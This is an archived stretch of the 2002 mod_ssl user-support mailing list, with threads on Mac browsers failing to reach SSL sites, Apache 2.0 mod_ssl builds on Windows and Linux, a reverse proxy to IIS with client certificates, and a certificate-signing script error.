______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 17:56:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA16450; Tue, 3 Sep 2002 17:55:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from indigo.quadrant.net id RAA16446; Tue, 3 Sep 2002 17:54:45 +0200 (MET DST)
Received: from [192.168.100.111] (gw.marketingden.com [204.83.38.101])
	by indigo.quadrant.net (8.9.1/8.9.1) with ESMTP id JAA12183
	for ; Tue, 3 Sep 2002 09:54:40 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.1.3108
Date: Tue, 03 Sep 2002 09:55:12 -0600
Subject: Re: Macs not able to access 128bit Security sites?
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: <25B12856E53F0047BE90FB2CFC0D1B59119679@rdsl_mlb_mx1.requestdsl.com.au>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You *really* need an SSLSessionCache in there, or it won't work, in my
experience.

> Hi guys,
> 
> I still can't get macs to access my secure site.....
> 
> can you see anything wrong with the following setup
> 
> PLEASE HELP ME.....:(
> 
> 
>       BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0
> force-response-1.0
> 
> 
> # see http://www.modssl.org/docs/2.8/ssl_reference.html for more info
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLSessionCache none
> 
> 
> SSLProtocol -ALL +SSLv2
> SSLOptions +CompatEnvVars +OptRenegotiate
> SLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP
> 
> 
> 
> SSLLog logs/SSL.log
> SSLLogLevel warn
> # You can later change "info" to "warn" if everything is OK
> 
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/certs/my-server.cert
> SSLCertificateKeyFile conf/ssl/private/my-server.key
> SSLCACertificateFile conf/ssl/ssl.crt/ca.crt
> 
> 
> 
> thankyou,
> Vince
> 
> -----Original Message-----
> From: Robert J. Pope [mailto:list-modssl-users@extromedia.com]
> Sent: Wednesday, 28 August 2002 1:35 AM
> To: modssl-users@modssl.org
> Subject: RE: Macs not able to access 128bit Security sites?
> 
> 
> Rob,
> 
> I thought I'd try it too. With MSIE 5.2.1(4717) On MacOS X (Jaguar), I
> was successfully able to access the site and connected with via an
> RC4-128 cipher. I also see you're using an Entrust cert as apposed to
> Verisign... Interesting.
> 
> - Robert
> 
> On Tue, 2002-08-27 at 10:33, Robert Lagana wrote:
>> Ben,
>> 
>> Can you try this site https://www.xe.com
>> 
>> Thanks,
>> Rob
>> 
>> -----Original Message-----
>> From: Ben Ricker [mailto:bricker@wellinx.com]
>> Sent: Tuesday, August 27, 2002 9:25 AM
>> To: Modssl List
>> Subject: Re: Macs not able to access 128bit Security sites?
>> 
>> 
>> The cipher is located within the browsers which is different then the
>> way Microsoft puts it in the system (hence the patch to upgrade the
>> cipher).
>> 
>> Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
>> sites. Are you using OSX?
>> 
>> Ben Ricker
>> Web Security System Administrator
>> Wellinx.com
>> 
>> On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
>>> Hi guys,
>>> Just wondered if anyone encountered issues with Macs not able to access
>> 128 bit encrypted sites?
>>> 
>>> (The Particular Mac in question is a Powerbook G3  )
>>> 
>>> I have also encountered problems with IE5 and IE6 where by the only way I
>> could get access to the site was by upgrading the security patches on the IE
>> version. Mac on the other hand has 128 bit encryption standard.
>>> 
>>> PLEASE HELP
>>> 
>>> Vince
>>> vmontuoro@request.com.au
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>> 
>> 
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 18:38:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA17569; Tue, 3 Sep 2002 18:37:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id SAA17562; Tue, 3 Sep 2002 18:36:26 +0200 (MET DST)
Received: (qmail 30519 invoked from network); 3 Sep 2002 16:36:24 -0000
Received: from unknown (HELO palantir) ([216.231.61.23]) (envelope-sender )
          by mail11.speakeasy.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP
          for ; 3 Sep 2002 16:36:24 -0000
Date: Tue, 3 Sep 2002 09:36:21 -0700 (PDT)
From: Paul English 
X-X-Sender: tallpaul@palantir
To: "modssl-users@modssl.org" 
Subject: RE: Apache 2.0.35 - ssl fails silently?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul English 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> Have you tried looking in ssl_engine.log?

That one wasn't being generated. Now I'm not sure what the problem was, 
but upgrading to 2.0.40 fixed it. Now that I've seen the build again, it 
is possible that mod_ssl failed to build, and I missed it as the messages 
scrolled past. I made sure that it did build for 2.0.40.

Thanks everyone,
Paul
> -----Original Message-----
> From: Paul English [mailto:tallpaul@speakeasy.org]
> Sent: 02 September 2002 22:55
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.0.35 - ssl fails silently?
> 
> 
> 
> > On Mon, 2 Sep 2002, Paul English wrote:
> > 
> > > 	I'm working with a new setup of 2.0.35 under Linux, and having
> > 
> > First of all, why 2.0.35 on a new setup?  2.0.36 was the first full
> > release (back in April).  2.0.40 is the current release.
> 
> 
> Oops, I guess I should have said "relatively new." It has been up and 
> running without any SSL for a few months.
> 
> I'm downloading 2.0.40 now, although I think the problem is most
> likely 
> configuration somehow.
> 
> Paul
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 19:27:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18738; Tue, 3 Sep 2002 19:26:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id TAA18674; Tue, 3 Sep 2002 19:25:06 +0200 (MET DST)
Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Tue, 3 Sep 2002 12:24:55 -0500
Received: from doorstop (doorstop.mayo.edu [129.176.212.87])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with SMTP id MAA17823
	for ; Tue, 3 Sep 2002 12:25:24 -0500 (CDT)
From: "Paul Bleimeyer" 
To: 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Date: Tue, 3 Sep 2002 12:21:52 -0500
Message-Id: <01e201c2536e$65a6e6a0$57d4b081@doorstop>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <4242F92CA015D5119B9600600834014202A7F4D7@claven.cistech.com>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul Bleimeyer" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Whose compiler did you use?

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Lakey,
> Jeremy # IHTUL
> Sent: Tuesday, September 03, 2002 10:52 AM
> To: 'modssl-users@modssl.org'
> Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on
> w2k?
>
>
> Ditto, compiled from scratch, apache 2.0.40, seperately
> compiled mod_ssl.so
> and moved it into the apache2 installed directory, worked fine..
>
>
>
> -----Original Message-----
> From: Andre Schild [mailto:A.Schild@aarboard.ch]
> Sent: Tuesday, September 03, 2002 10:25 AM
> To: modssl-users@modssl.org
> Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
>
>
> >Has anyone successfully implemented mod_sll under 2.40
> apache for w2k?
> >I am getting a 501 1051 internal server error back. The ssl
> engine is
> >loading but no response when I connect to the port.
>
> 2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
> Did compile it from the scratch...
>
> Binaries are here:
> http://www.switzerland.net/Pneatec/
>
> André
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 20:16:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20587; Tue, 3 Sep 2002 20:15:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp1.ndchealth.com id UAA20512; Tue, 3 Sep 2002 20:14:11 +0200 (MET DST)
Received: from claven.cistech.com (claven.cistech.com [198.200.166.25])
	by smtp1.ndchealth.com (8.11.6/8.11.6) with ESMTP id g83IE5i21682
	for ; Tue, 3 Sep 2002 14:14:05 -0400
Received: by claven.cistech.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 3 Sep 2002 13:14:58 -0500
Message-ID: <4242F92CA015D5119B9600600834014202A7F4D9@claven.cistech.com>
From: "Lakey, Jeremy # IHTUL" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Date: Tue, 3 Sep 2002 13:14:57 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA20553
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lakey, Jeremy # IHTUL" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Microsoft, VC6 Sp3

-----Original Message-----
From: Paul Bleimeyer [mailto:paulb@mayo.edu] 
Sent: Tuesday, September 03, 2002 12:22 PM
To: modssl-users@modssl.org
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?


Whose compiler did you use?

> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Lakey, Jeremy # 
> IHTUL
> Sent: Tuesday, September 03, 2002 10:52 AM
> To: 'modssl-users@modssl.org'
> Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on 
> w2k?
>
>
> Ditto, compiled from scratch, apache 2.0.40, seperately compiled 
> mod_ssl.so and moved it into the apache2 installed directory, worked 
> fine..
>
>
>
> -----Original Message-----
> From: Andre Schild [mailto:A.Schild@aarboard.ch]
> Sent: Tuesday, September 03, 2002 10:25 AM
> To: modssl-users@modssl.org
> Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
>
>
> >Has anyone successfully implemented mod_sll under 2.40
> apache for w2k?
> >I am getting a 501 1051 internal server error back. The ssl
> engine is
> >loading but no response when I connect to the port.
>
> 2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
> Did compile it from the scratch...
>
> Binaries are here:
> http://www.switzerland.net/Pneatec/
>
> André 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 21:42:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA22207; Tue, 3 Sep 2002 21:41:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web20910.mail.yahoo.com id VAA22188; Tue, 3 Sep 2002 21:40:17 +0200 (MET DST)
Message-ID: <20020903194014.19894.qmail@web20910.mail.yahoo.com>
Received: from [81.86.178.191] by web20910.mail.yahoo.com via HTTP; Tue, 03 Sep 2002 12:40:14 PDT
Date: Tue, 3 Sep 2002 12:40:14 -0700 (PDT)
From: GOSS 
Subject: Apache Reverse Proxy to a remote IIS v5.0 with a client certificate
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: GOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am setting up an Apache 1.3.26 reverse proxy on
Linux to a remote IIS v5.0 server with a client
certificate but it doesn't work. I kept getting 403
forbidden error because IIS v5.0 does not send a list
of acceptable CAs to the Apache reverse proxy so
Apache doesn't send the client certificate to IIS.

In my httpd.conf file,

SSLProxyMachineCertificateFile points_to_client_cert
SSLProxyCAMachineCertificateFile
points_to_CA_of_IIS_server_cert
ProxyPass /test/ https://www.testiis.server/
ProxyPassReverse /test/ https://www.testiis.server/

There is nothing wrong with my Apache reverse proxy
setup because it works fine when I set it to another
remote Apache web server with client certificate
(SSLVerify required). I used "openssl s_client
-connect ..." to test the IIS server and found that it
wasn't sending a list of acceptable CAs to the client.

I have configured IIS with One-to-One Mapping as per
instructions on this webpage:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/ad/windows2000/howto/mapcerts.asp

I just want to make sure that it is a IIS problem for
not sending the list of acceptable CAs. Has anyone
here got this type of set up to work before?

Thanks!
GOSS

__________________________________________________
Do You Yahoo!?
Yahoo! Finance - Get real-time stock quotes
http://finance.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 03:21:39 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA29696; Wed, 4 Sep 2002 03:20:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id DAA29684; Wed, 4 Sep 2002 03:19:51 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Macs not able to access 128bit Security sites?
Date: Wed, 4 Sep 2002 11:18:29 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B5935B711@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: Macs not able to access 128bit Security sites?
Thread-Index: AcJTYlzmNIZhuTsVTdSq8CWDE3JlKQATdTvQ
From: "Vince Montuoro" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id DAA29691
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You were right!!!! Thank you so much 

i included the following lines and it worked fine

SSLSessionCache dbm:/apache/logs/ssl_gcache_data
SSLSessionCacheTimeout 600



-----Original Message-----
From: James Hastings-Trew [mailto:	
Sent: Wednesday, 4 September 2002 1:55 AM
To: modssl-users@modssl.org
Subject: Re: Macs not able to access 128bit Security sites?


You *really* need an SSLSessionCache in there, or it won't work, in my
experience.

> Hi guys,
> 
> I still can't get macs to access my secure site.....
> 
> can you see anything wrong with the following setup
> 
> PLEASE HELP ME.....:(
> 
> 
>       BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0
> force-response-1.0
> 
> 
> # see http://www.modssl.org/docs/2.8/ssl_reference.html for more info
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLSessionCache none
> 
> 
> SSLProtocol -ALL +SSLv2
> SSLOptions +CompatEnvVars +OptRenegotiate
> SLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP
> 
> 
> 
> SSLLog logs/SSL.log
> SSLLogLevel warn
> # You can later change "info" to "warn" if everything is OK
> 
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/certs/my-server.cert
> SSLCertificateKeyFile conf/ssl/private/my-server.key
> SSLCACertificateFile conf/ssl/ssl.crt/ca.crt
> 
> 
> 
> thankyou,
> Vince
> 
> -----Original Message-----
> From: Robert J. Pope [mailto:list-modssl-users@extromedia.com]
> Sent: Wednesday, 28 August 2002 1:35 AM
> To: modssl-users@modssl.org
> Subject: RE: Macs not able to access 128bit Security sites?
> 
> 
> Rob,
> 
> I thought I'd try it too. With MSIE 5.2.1(4717) On MacOS X (Jaguar), I
> was successfully able to access the site and connected with via an
> RC4-128 cipher. I also see you're using an Entrust cert as apposed to
> Verisign... Interesting.
> 
> - Robert
> 
> On Tue, 2002-08-27 at 10:33, Robert Lagana wrote:
>> Ben,
>> 
>> Can you try this site https://www.xe.com
>> 
>> Thanks,
>> Rob
>> 
>> -----Original Message-----
>> From: Ben Ricker [mailto:bricker@wellinx.com]
>> Sent: Tuesday, August 27, 2002 9:25 AM
>> To: Modssl List
>> Subject: Re: Macs not able to access 128bit Security sites?
>> 
>> 
>> The cipher is located within the browsers which is different then the
>> way Microsoft puts it in the system (hence the patch to upgrade the
>> cipher).
>> 
>> Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
>> sites. Are you using OSX?
>> 
>> Ben Ricker
>> Web Security System Administrator
>> Wellinx.com
>> 
>> On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
>>> Hi guys,
>>> Just wondered if anyone encountered issues with Macs not able to access
>> 128 bit encrypted sites?
>>> 
>>> (The Particular Mac in question is a Powerbook G3  )
>>> 
>>> I have also encountered problems with IE5 and IE6 where by the only way I
>> could get access to the site was by upgrading the security patches on the IE
>> version. Mac on the other hand has 128 bit encryption standard.
>>> 
>>> PLEASE HELP
>>> 
>>> Vince
>>> vmontuoro@request.com.au
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>> 
>> 
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 08:09:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04591; Wed, 4 Sep 2002 08:08:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id IAA04586; Wed, 4 Sep 2002 08:07:48 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id mhztbaaa for modssl-users@modssl.org; Wed, 4 Sep 2002 08:07:37 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVGW 2.5.2.12) with SMTP id M2002090408073625204
 for ; Wed, 04 Sep 2002 08:07:36 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Wed, 04 Sep 2002 08:06:47 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Wed, 04 Sep 2002 08:06:23 +0200
From: "Andre Schild" 
To: 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on
	w2k?
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA04587
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> jeremy.lakey@ndchealth.com 
>Microsoft, VC6 Sp3

Dito.

André

-----Original Message-----
From: Paul Bleimeyer [mailto:paulb@mayo.edu] 
Sent: Tuesday, September 03, 2002 12:22 PM
To: modssl-users@modssl.org 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on
w2k?


Whose compiler did you use?

> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Lakey, Jeremy # 
> IHTUL
> Sent: Tuesday, September 03, 2002 10:52 AM
> To: 'modssl-users@modssl.org' 
> Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on

> w2k?
>
>
> Ditto, compiled from scratch, apache 2.0.40, seperately compiled 
> mod_ssl.so and moved it into the apache2 installed directory, worked

> fine..
>
>
>
> -----Original Message-----
> From: Andre Schild [mailto:A.Schild@aarboard.ch] 
> Sent: Tuesday, September 03, 2002 10:25 AM
> To: modssl-users@modssl.org 
> Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on
w2k?
>
>
> >Has anyone successfully implemented mod_sll under 2.40
> apache for w2k?
> >I am getting a 501 1051 internal server error back. The ssl
> engine is
> >loading but no response when I connect to the port.
>
> 2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
> Did compile it from the scratch...
>
> Binaries are here:
> http://www.switzerland.net/Pneatec/ 
>
> André 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
www.modssl.org 
> User Support Mailing List                     
modssl-users@modssl.org 
> Automated List Manager                           
majordomo@modssl.org 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
www.modssl.org 
> User Support Mailing List                     
modssl-users@modssl.org 
> Automated List Manager                           
majordomo@modssl.org 
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 08:58:00 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA05152; Wed, 4 Sep 2002 08:56:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA05123; Wed, 4 Sep 2002 08:55:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 32AD14CE620; Wed,  4 Sep 2002 08:55:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0E59F28695; Wed,  4 Sep 2002 08:44:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpauth2-ext.prodigy.net id BAA27718; Wed, 4 Sep 2002 01:28:41 +0200 (MET DST)
Received: from win1 (crtntx1-ar1-4-60-243-096.crtntx1.dsl-verizon.net [4.60.243.96])
	(authenticated)
	by smtpauth2-ext.prodigy.net (8.11.0/8.11.0) with ESMTP id g83NSc4267590
	for ; Tue, 3 Sep 2002 19:28:39 -0400
Message-ID: <008701c253a1$a973e4e0$60f33c04@win1>
From: "Jimi Thompson" 
To: 
Subject: Not able to self sign
Date: Tue, 3 Sep 2002 18:28:50 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0084_01C25377.BFDD4C00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jimi Thompson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0084_01C25377.BFDD4C00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

FreeBSD 4.5, Apache 2.0.8, OpenSSL 0.9.6a, and mod_ssl 2.8.10

I keep getting this -=20

web1# ./sign.sh server.csr
CSR=3Dserver.csr: Command not found.
if: Expression Syntax.


I've tried everything I can think of.  If anyone can offer any help, I'd =
be interested.  I've tried Google, but all I find are a LOT of people =
asking the same question and no one seems to have answered any of us.  =
I've re-downloaded, chmod, copied, moved, you name it.  I still get the =
same error.  =20

Thanks,

Jimi



------=_NextPart_000_0084_01C25377.BFDD4C00
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









FreeBSD 4.5,=20
Apache 2.0.8, OpenSSL 0.9.6a, and mod_ssl 2.8.10


I keep getting this - 


 


web1# ./sign.sh =
server.csr
CSR=3Dserver.csr:=20
Command not found.
if: Expression Syntax.


 


I've tried everything I can think =
of.  If=20
anyone can offer any help, I'd be interested.  I've tried Google, =
but all I=20
find are a LOT of people asking the same question and no one seems to =
have=20
answered any of us.  I've re-downloaded, chmod, copied, moved, you =
name=20
it.  I still get the same error.   


 


Thanks,


 


Jimi


 


 


------=_NextPart_000_0084_01C25377.BFDD4C00--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  4 08:58:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA05155; Wed, 4 Sep 2002 08:56:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA05127; Wed, 4 Sep 2002 08:55:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5878C4CE729; Wed,  4 Sep 2002 08:55:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E753028833; Wed,  4 Sep 2002 08:44:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id UAA20473; Tue, 3 Sep 2002 20:12:01 +0200 (MET DST)
